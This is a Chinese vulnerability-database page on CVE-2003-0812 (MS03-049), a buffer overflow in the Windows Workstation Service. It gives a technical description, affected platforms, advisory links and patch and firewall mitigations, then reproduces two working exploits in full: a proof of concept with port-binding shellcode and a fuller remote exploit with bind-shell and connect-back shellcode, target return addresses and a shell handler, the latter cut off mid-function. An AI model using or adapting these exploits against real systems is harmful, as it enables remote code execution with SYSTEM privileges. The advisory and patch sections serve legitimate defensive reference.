CVE-2003-0812
CVSS7.5
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:37:30
NMCOEPS    

[原文]Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API.


[CNNVD]Microsoft Windows工作站服务远程缓冲区溢出漏洞(MS03-049/KB828749)(CNNVD-200312-058)

        
        Microsoft DCE/RPC服务可以提供网络管理功能,这些功能提供管理用户帐户和网络资源管理的功能。部分网络管理功能在Windows目录下的"debug"子目录会生成调试日志文件。
        Microsoft Workstation服务在处理日志记录时缺少充分的边界缓冲区检查,远程攻击者可以利用这个漏洞提供超长参数触发缓冲区溢出,以SYSTEM权限在系统上执行任意指令。
        日志功能中使用vsprintf()在日志文件中生成字符串,日志文件名为"NetSetup.LOG",其保存在Windows "debug"目录中。
        这个记录函数有部分处理Workstation服务命令的函数调用,如"NetValidateName", "NetJoinDomain"等,在这NetValidateName()中,"computer name"作为第二个参数最终记录在日志文件中。
        如我们使用NetValidateName() API:
         NetValidateName(L"\\\\192.168.0.100","AAAAAAAA",NULL,NULL,0);
        那么我们可以在远程主机中产生如下记录条目:
         08/13 13:01:01 NetpValidateName: checking to see if '' is valid as type 0 name
         08/13 13:01:01 NetpValidateName: '' is not a valid NetBIOS \\AAAAAAAA name: 0x57
        
        如果我们指定超长字符串作为NetValidateName() API的第二个参数,如果调试文件可写就可以在特定主机上发生缓冲区溢出。
        一般如果是NTFS文件系统,在Windows目录中的"debug"目录不允许所有人可写,这表示不能使用NULL会话来生成日志。WsImpersonateClient() API在打开日志文件前调用,如果连接客户端没有有效的权限来写日志文件,那么CreateFile()就会失败,vsprintf()就不会被执行,因此此漏洞在FAT32系统和"%SYSTEMROOT%\debug"目录可写的情况下可被利用。
        但是部分扩展RPC函数实现在Windows XP上在调用WsImpersonateClient()前打开日志文件,不过这些RPC函数没有提供文档化说明,不过可以观察在WKSSVC.DLL中的函数表观察到。这些扩展命令的RPC号开始于0x1B,如0x1B调用NetpManageComputers(),但在打开日志文件前不调用WsImpersonateClient()。
        NetpManageComputers()的使用没有被公开化,但是我们可以在"LMJoin.h"中找到NetAddAlternateComputerName() API的原型定义,这个API从NETAPI32.DLL导出,这个API也一样没有文档化。我们可以执行这个RPC函数(0x1B)使用如下API产生包:
         NetAddAlternateComputerName(L"\\\\192.168.0.200",long_unicode_string,NULL,NULL,0);
        我们不需要特殊权限在远程主机上写第二个产生到日志文件中,如定义超长Unicode字符串作为第二个参数("AlternateName"),在第一个参数定义的远程系统就会由于缓冲区溢出而崩溃。Unicode字符串"long_unicode_string"会在日志记录函数调用前被转换为ASCII字符串。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:575Windows 2000 Workstation Service Logging Function Buffer Overflow
oval:org.mitre.oval:def:331Windows XP Workstation Service Logging Function Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0812
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0812
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-058
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106859247713009&w=2
(UNKNOWN)  BUGTRAQ  20031111 EEYE: Windows Workstation Service Remote Buffer Overflow
http://marc.info/?l=bugtraq&m=106865197102041&w=2
(UNKNOWN)  BUGTRAQ  20031112 Proof of concept for Windows Workstation Service overflow
http://www.cert.org/advisories/CA-2003-28.html
(UNKNOWN)  CERT  CA-2003-28
http://www.cisco.com/warp/public/707/cisco-sa-20040129-ms03-049.shtml
(UNKNOWN)  CISCO  20040129 Buffer Overrun in Microsoft Windows 2000 Workstation Service (MS03-049)
http://www.kb.cert.org/vuls/id/567620
(VENDOR_ADVISORY)  CERT-VN  VU#567620
http://www.microsoft.com/technet/security/bulletin/MS03-049.asp
(VENDOR_ADVISORY)  MS  MS03-049
http://www.securityfocus.com/bid/9011
(VENDOR_ADVISORY)  BID  9011

- 漏洞信息

Microsoft Windows工作站服务远程缓冲区溢出漏洞(MS03-049/KB828749)
高危 边界条件错误
2003-12-15 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft DCE/RPC服务可以提供网络管理功能,这些功能提供管理用户帐户和网络资源管理的功能。部分网络管理功能在Windows目录下的"debug"子目录会生成调试日志文件。
        Microsoft Workstation服务在处理日志记录时缺少充分的边界缓冲区检查,远程攻击者可以利用这个漏洞提供超长参数触发缓冲区溢出,以SYSTEM权限在系统上执行任意指令。
        日志功能中使用vsprintf()在日志文件中生成字符串,日志文件名为"NetSetup.LOG",其保存在Windows "debug"目录中。
        这个记录函数有部分处理Workstation服务命令的函数调用,如"NetValidateName", "NetJoinDomain"等,在这NetValidateName()中,"computer name"作为第二个参数最终记录在日志文件中。
        如我们使用NetValidateName() API:
         NetValidateName(L"\\\\192.168.0.100","AAAAAAAA",NULL,NULL,0);
        那么我们可以在远程主机中产生如下记录条目:
         08/13 13:01:01 NetpValidateName: checking to see if '' is valid as type 0 name
         08/13 13:01:01 NetpValidateName: '' is not a valid NetBIOS \\AAAAAAAA name: 0x57
        
        如果我们指定超长字符串作为NetValidateName() API的第二个参数,如果调试文件可写就可以在特定主机上发生缓冲区溢出。
        一般如果是NTFS文件系统,在Windows目录中的"debug"目录不允许所有人可写,这表示不能使用NULL会话来生成日志。WsImpersonateClient() API在打开日志文件前调用,如果连接客户端没有有效的权限来写日志文件,那么CreateFile()就会失败,vsprintf()就不会被执行,因此此漏洞在FAT32系统和"%SYSTEMROOT%\debug"目录可写的情况下可被利用。
        但是部分扩展RPC函数实现在Windows XP上在调用WsImpersonateClient()前打开日志文件,不过这些RPC函数没有提供文档化说明,不过可以观察在WKSSVC.DLL中的函数表观察到。这些扩展命令的RPC号开始于0x1B,如0x1B调用NetpManageComputers(),但在打开日志文件前不调用WsImpersonateClient()。
        NetpManageComputers()的使用没有被公开化,但是我们可以在"LMJoin.h"中找到NetAddAlternateComputerName() API的原型定义,这个API从NETAPI32.DLL导出,这个API也一样没有文档化。我们可以执行这个RPC函数(0x1B)使用如下API产生包:
         NetAddAlternateComputerName(L"\\\\192.168.0.200",long_unicode_string,NULL,NULL,0);
        我们不需要特殊权限在远程主机上写第二个产生到日志文件中,如定义超长Unicode字符串作为第二个参数("AlternateName"),在第一个参数定义的远程系统就会由于缓冲区溢出而崩溃。Unicode字符串"long_unicode_string"会在日志记录函数调用前被转换为ASCII字符串。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在防火墙上过滤UDP 138, 139, 445端口和TCP 138, 139, 445端口。
        * 使用个人防火墙过滤进入的流量,比如Windows XP捆绑的Internet连接防火墙。
        * 在Windows 2000和Windows XP自带的高级TCP/IP过滤。
        * 禁用Workstation服务。
        
        注意: 禁用此服务将导致很多依赖它的服务失效,例如您将不能访问共享资源, 不能使用拨号、 *DSL、Cable modem连接等等。仅推荐有经验的用户使用此方法。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-049)以及相应补丁:
        MS03-049:Buffer Overrun in the Workstation Service Could Allow Code Execution (828749)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-049.asp

        补丁下载:
        Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=2467FE46-D167-479C-9638-D4D79483F261&displaylang=en

        Microsoft Windows XP, Microsoft Windows XP Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=F02DA309-4B0A-4438-A0B9-5B67414C3833&displaylang=en

        Microsoft Windows XP 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=2BE95254-4C65-4CA5-80A5-55FDF5AA2296&displaylang=en

- 漏洞信息 (119)

MS Windows 2000/XP Workstation Service Overflow (MS03-049) (EDBID:119)
windows remote
2003-11-12 Verified
0 eEye
N/A [点击下载]
/*
        Proof of concept for MS03-049.
        This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
        to work *only* with that (it will probably crash the the other 2Ks, no clue
        about XPs).

        To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
        this public version, do not bother to ask.
        
        Credits go to eEye
        See original bulletin for more information, it is very well documented.
*/

#include <stdio.h>
#include <win.h>
#include <string.h>

typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);

#define SIZE 2048

// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25";

unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload

int main(void)
{
        int ret;
        HINSTANCE hInstance;
        MYPROC procAddress;
        char szBuffer[SIZE];
        NETRESOURCE netResource;

        netResource.lpLocalName = NULL;
        netResource.lpProvider = NULL;
        netResource.dwType = RESOURCETYPE_ANY;
        netResource.lpRemoteName = "\\\\192.168.175.3\\ipc$";

        ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
        if (ret != 0)
        {
                fprintf(stderr, "[-] WNetAddConnection2 failed\n");
                return 1;
        }

        hInstance = LoadLibrary("netapi32");
        if (hInstance == NULL)
        {
                fprintf(stderr, "[-] LoadLibrary failed\n");
                return 1;
        }

        procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you tocheck NetAddAlternateComputerName
        if (procAddress == NULL)
        {
                fprintf(stderr, "[-] GetProcAddress failed\n");
                return 1;
        }

        memset(szBuffer, 0x90, sizeof(szBuffer));
        memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
        // ebp @ &szBuffer[2013]
        *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, useopcode search engine for more, but
                      // be aware that a call esp willchange the offset in the stack)
        memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
        ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0);

        WNetCancelConnection2("\\\\192.168.175.3\\ipc$", 0, TRUE);
        FreeLibrary(hInstance);

        return 0;
}

// milw0rm.com [2003-11-12]
		

- 漏洞信息 (123)

MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049) (EDBID:123)
windows remote
2003-11-14 Verified
0 snooq
N/A [点击下载]
/*
 *  Author: snooq
 *  Date: 14 November 2003  
 *
 *  +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
 *
 *  This is just slightly better than the one I posted to
 *  packetstorm....
 *
 *  The public version will crash 'services.exe' immediately
 *  while this one crash it only when u exit from shell....
 *
 *  I'm still trying to figure out a way to avoid the 'crash'
 *  all together... any ideas????
 *
 *  Let me know if you hav trouble compiling this shit...
 *  I hope this could be a good e.g for u to try Win32
 *  exploitation..
 *
 *  This code is crappy... if u know of a better way of doing
 *  things... pls tell me.......
 *
 *  Otherwise, if you guys r keen... I'll be more than happy
 *  to go thru this in details wif u all... Meanwhile..enjoy!
 *
 *  +++++++++++++++++++++++++++++++++++++++++++++++++
 */

#pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib") 
#pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib") 
#pragma comment (linker,"/NODEFAULTLIB:libcmt.lib") 
#pragma comment (linker,"/NODEFAULTLIB:libcd.lib") 
#pragma comment (lib,"ws2_32")
#pragma comment (lib,"msvcrt")
#pragma comment (lib,"mpr")
#pragma warning (disable:4013)

#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <lm.h>

#define NOP	0x90
#define PORT	24876
#define KEY	0x99999999

#define ALIGN		1	// Between 0 ~ 3
#define TARGET		1
#define INTERVAL	3
#define TIME_OUT	20
#define PORT_OFFSET_1	198
#define PORT_OFFSET_2	193 
#define IP_OFFSET	186 
#define SC_OFFSET	20	// Gap for some NOPs...
#define RET_SIZE	2026	// Big enuff to take EIP... ;)

#define SC_SIZE_1	sizeof(bindport)
#define SC_SIZE_2	sizeof(connback)

#define BSIZE	2600
#define SSIZE	128

extern char getopt(int,char **,char*);
extern char *optarg;
static int alarm_fired=0;

HMODULE hMod;
FARPROC fxn;
HANDLE t1, t2;

char buff[BSIZE];

struct {
	char *os;
	long jmpesp;
	char *dll;
}

targets[] = {
	{
		"Window 2000 (en) SP4",
		0x77e14c29,
		"user32.dll 5.0.2195.6688" 
	},
	{
		"Window 2000 (en) SP1",
		0x77e3cb4c,
		"user32.dll 5.0.2195.1600" 
	},
	{
		"For debugging only",
		0x41424344,
		"dummy.dll 5.0.2195.1600" 
	}
}, v;

/*
 * HD Moore's shellcode..... ;)
 */

char bindport[]=
	"\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
	"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
	"\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
	"\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
	"\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
	"\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
	"\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
	"\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
	"\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
	"\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
	"\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
	"\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
	"\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
	"\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
	"\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
	"\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
	"\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
	"\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
	"\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
	"\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
	"\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
	"\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
	"\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
	"\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
	"\xc2\x5b\x91\x99";

char connback[]=
	"\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
	"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
	"\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
	"\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
	"\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
	"\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
	"\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
	"\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
	"\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
	"\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
	"\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
	"\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
	"\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
	"\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
	"\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
	"\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
	"\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
	"\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
	"\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
	"\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
	"\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
	"\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
	"\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";

void err_exit(char *s) {
	printf("%s\n",s);
	exit(0);
}

/*
 * Ripped from TESO code and modifed by ey4s for win32
 * and... lamer quoted it wholesale here..... =p
 */

void doshell(int sock) {
	int l;
	char buf[512];
	struct timeval time;
	unsigned long ul[2];

	time.tv_sec=1;
	time.tv_usec=0;

	while (1) {
		ul[0]=1;
		ul[1]=sock;

		l=select(0,(fd_set *)&ul,NULL,NULL,&time);
		if(l==1) {
			l=recv(sock,buf,sizeof(buf),0);
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
			l=write(1,buf,l);
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
		}
		else {
			l=read(0,buf,sizeof(buf));
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
			l=send(sock,buf,l,0);
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
		}
	}
}

void changeip(char *ip) {
	char *ptr;
	ptr=connback+IP_OFFSET;
	/* Assume Little-Endianess.... */
	*((long *)ptr)=inet_addr(ip)^KEY;
}

void changeport(char *code, int port, int offset) {
	char *ptr;
	ptr=code+offset;
	port^=KEY;
	/* Assume Little-Endianess.... */
	*ptr++=(char)((port>>8)&0xff);
	*ptr++=(char)(port&0xff);
}

void banner() {
	printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n");
}

void usage(char *s) {
	banner();
	printf("Usage: %s [options]\n",s);
	printf("\t-r\tSize of 'return addresses'\n");
	printf("\t-a\tAlignment size [0~3]\n");
	printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
	printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
	printf("\t-s\tShellcode offset from the return address\n");
	printf("\t-h\tTarget's IP\n");
	printf("\t-t\tTarget types. ( -H for more info )\n");
	printf("\t-H\tShow list of possible targets\n");
	printf("\t-l\tListening for shell connecting\n");
	printf("\t\tback to port specified by '-p' switch\n");
	printf("\t-i\tIP for shell to connect back\n");
	printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
	printf("\t-T\tTime out (in number of seconds)\n\n");
	printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");
	printf("\t'-i' is mandatory if '-l' is specified\n\n");
	exit(0);
}

void showtargets() {
	int i;
	banner();
	printf("Possible targets are:\n");
	printf("=====================\n");
	for (i=0;i<sizeof(targets)/sizeof(v);i++) {
		printf("%d) %s",i+1,targets[i].os);
		printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll);
	}
	exit(0);
}

void sendstr(char *host) {

	WCHAR wStr[128];
	char ipc[128], hStr[128];

	DWORD ret;
	NETRESOURCE NET;

	hMod=LoadLibrary("netapi32.dll");
	fxn=GetProcAddress(hMod,"NetValidateName");

	_snprintf(ipc,127,"\\\\%s\\ipc$",host);
	_snprintf(hStr,127,"\\\\%s",host);
	MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));

	NET.lpLocalName = NULL;
	NET.lpProvider = NULL;
	NET.dwType = RESOURCETYPE_ANY;
	NET.lpRemoteName = (char*)&ipc;

	printf("-> Setting up $IPC session...(aka 'null session')\n");
	ret=WNetAddConnection2(&NET,"","",0);

	if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
	else printf("-> IPC$ session setup successfully...\n");

	printf("-> Sending exploit string...\n");

	ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);

}

VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
	err_exit("-> I give up...dude.....");
}

void setalarm(int timeout) {

	MSG msg = { 0, 0, 0, 0 };
	SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);

	while(!alarm_fired) {
		if (GetMessage(&msg, 0, 0, 0) ) {
			if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
			DispatchMessage(&msg);
		}
	}

}

void resetalarm() {
	if (TerminateThread(t2,0)==0) {
		err_exit("-> Failed to reset alarm...");
	}
	if (TerminateThread(t1,0)==0) {
		err_exit("-> Failed to kill the 'sending' thread...");
	}
}

void do_send(char *host,int timeout) {
	t1=(HANDLE)_beginthread(sendstr,0,host);
	if (t1==0) { err_exit("-> Failed to send exploit string..."); }
	t2=(HANDLE)_beginthread(setalarm,0,timeout);
	if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
}

int main(int argc, char *argv[]) {

	char opt;
	char *host, *ptr, *ip="";
	struct sockaddr_in sockadd;
	int i, i_len, ok=0, mode=0, flag=0;
	int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
	int target=TARGET, scsize=SC_SIZE_1, port=PORT;
	int timeout=TIME_OUT, interval=INTERVAL;
	long retaddr;

	WSADATA wsd;
	SOCKET s1, s2;

	if (argc<2) { usage(argv[0]); }

	while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
		switch(opt) {
			case 'a':
			align=atoi(optarg);
			break;

			case 'I':
			interval=atoi(optarg);
			break;

			case 'T':
			timeout=atoi(optarg);
			break;

			case 't':
			target=atoi(optarg);
			retaddr=targets[target-1].jmpesp;
			break;

			case 'i':
			ip=optarg;
			changeip(ip);
			break;

			case 'l':
			mode=1;
			scsize=SC_SIZE_2;
			break;

			case 'r':
			retsize=atoi(optarg);
			break;

			case 's':
			sc_offset=atoi(optarg);
			break;
			
			case 'h':
			ok=1;
			host=optarg;
			sockadd.sin_addr.s_addr=inet_addr(optarg);
			break;

			case 'p':
			port=atoi(optarg);
			break;

			case 'H':
			showtargets();
			break;

			default:
			usage(argv[0]);
			break;
		}
	}

	if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }

	memset(buff,NOP,BSIZE);

	ptr=buff+align;
	for(i=0;i<retsize;i+=4) {
		*((long *)ptr)=retaddr;
		ptr+=4;
	}

	if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
		err_exit("-> WSAStartup error....");
	}

	if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
